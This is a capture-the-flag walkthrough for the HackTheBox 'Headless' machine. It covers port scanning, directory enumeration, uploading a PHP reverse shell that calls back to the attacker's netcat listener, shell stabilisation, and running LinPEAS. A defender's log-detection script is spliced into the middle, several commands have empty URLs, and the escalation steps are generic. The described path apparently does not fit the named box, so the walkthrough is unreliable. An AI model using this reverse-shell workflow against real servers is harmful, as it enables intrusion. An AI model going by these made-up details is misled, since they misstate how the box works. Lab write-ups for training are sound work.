HackTheBox Headless Walkthrough


Step 1: Reconnaissance

Start by scanning the machine with Nmap to identify open ports and services.

nmap -sC -sV -oN headless.nmap <machine-ip>

  • -sC: Run default scripts.
  • -sV: Detect service versions.
  • -oN: Output scan results to a file.

Expected Output:

22/tcp  open  ssh     OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.25 (Debian)

From the scan, we learn that the server is running SSH on port 22 and Apache HTTP on port 80.

Step 2: Web Enumeration

Let’s check the web server on port 80 by navigating to http://<machine-ip> in your browser. You should see a basic web page. Next, we’ll use Gobuster to enumerate directories.

gobuster dir -u http://<machine-ip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt

Expected Output:

/.hta                 (Status: 403) [Size: 294]
/.htaccess            (Status: 403) [Size: 294]
/.htpasswd            (Status: 403) [Size: 294]
/robots.txt           (Status: 200) [Size: 28]

There is a robots.txt file. Let’s inspect it:

curl http://<machine-ip>/robots.txt

Expected Output:

User-agent: *
Disallow: /upload

This file asks crawlers not to index the /upload directory. It does not restrict access to it, so the directory is worth checking out. Visit http://<machine-ip>/upload in your browser, and you should find an upload form.

Step 3: Exploiting the File Upload

Try uploading a simple PHP reverse shell to the server. You can get one from PentestMonkey.

First, download the reverse shell:

wget <>

Open the file and modify the IP address and port to match your attacking machine:

nano php-reverse-shell.php

$ip = 'your-ip'; // IP address of your machine
$port = 4444;   // Port on which your listener will run

Now, attempt to upload the PHP shell via the web form. Once uploaded, you can access it through the URL:


But before visiting the URL, set up a listener on your machine using Netcat:

nc -lvnp 4444

If the upload is successful, visiting the PHP file should trigger the reverse shell, and you should get a connection.
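Seen from the defending side, the upload-then-request sequence in this step leaves a recognisable trail in the Apache access log. The following detection sketch is an added example, not part of the original walkthrough; it assumes the combined log format, the /upload path from robots.txt, a 30-minute correlation window, and constructed sample log lines.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import unquote

# Apache "combined" access-log line: host ident user [time] "request" status size ...
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
UPLOAD_PREFIX = "/upload"            # path taken from the walkthrough's robots.txt
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(/|$)", re.IGNORECASE)
WINDOW = timedelta(minutes=30)       # assumed correlation window

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Mar/2024:10:01:02 +0000] "GET /robots.txt HTTP/1.1" 200 28 "-" "curl/8.5.0"',
    '198.51.100.7 - - [12/Mar/2024:10:03:40 +0000] "POST /upload HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Mar/2024:10:04:05 +0000] "GET /upload/avatar.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Mar/2024:10:05:00 +0000] "POST /upload HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Mar/2024:10:05:09 +0000] "GET /upload/photo.jpg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"',
]

def parse(line):
    """Return (ip, time, method, decoded path without query, status) or None."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    path = unquote(m["path"].split("?", 1)[0])
    return m["ip"], ts, m["method"], path, int(m["status"])

def find_upload_then_execute(lines):
    """Flag clients that POST to the upload path, then get a 200 for a script under it."""
    last_post, alerts = {}, []
    for ip, ts, method, path, status in filter(None, map(parse, lines)):
        if path != UPLOAD_PREFIX and not path.startswith(UPLOAD_PREFIX + "/"):
            continue
        if method == "POST" and status < 400:
            last_post[ip] = ts       # remember the most recent accepted upload
        elif method == "GET" and status == 200 and SCRIPT_EXT.search(path):
            posted = last_post.get(ip)
            if posted is not None and timedelta(0) <= ts - posted <= WINDOW:
                alerts.append({"ip": ip, "path": path,
                               "delay_s": int((ts - posted).total_seconds())})
    return alerts

if __name__ == "__main__":
    for alert in find_upload_then_execute(SAMPLE_LOG):
        print(alert)
```

A 200 response for a script extension inside an upload directory also means the server is interpreting uploaded files there, which is the condition to remove regardless of whether an alert fires.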

Step 4: Gaining a Shell

Once you have a reverse shell, stabilize it:

python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

Step 5: Privilege Escalation

Let’s enumerate the system for privilege escalation possibilities. Start by checking sudo privileges:

sudo -l

If no immediate sudo privileges are available, check for SUID binaries:

find / -perm -u=s -type f 2>/dev/null

Alternatively, you can use LinPEAS to automate the enumeration process. Download and execute it:

wget <>
chmod +x

Step 6: Exploiting a Vulnerability

During the enumeration, you may find an exploitable vulnerability, such as a misconfigured service, outdated software, or a SUID binary that can be abused for privilege escalation. Follow through with the appropriate exploit method depending on the findings.

Step 7: Capture the Flags

Once you escalate privileges to root, navigate to the home directories to find the flags.

For the user flag:

cat /home/<username>/user.txt

For the root flag:

cat /root/root.txt

With that, you’ve completed the Headless box on Hack The Box. Remember, the specific vulnerability exploited might vary based on enumeration results, so always adapt based on what you find during enumeration.

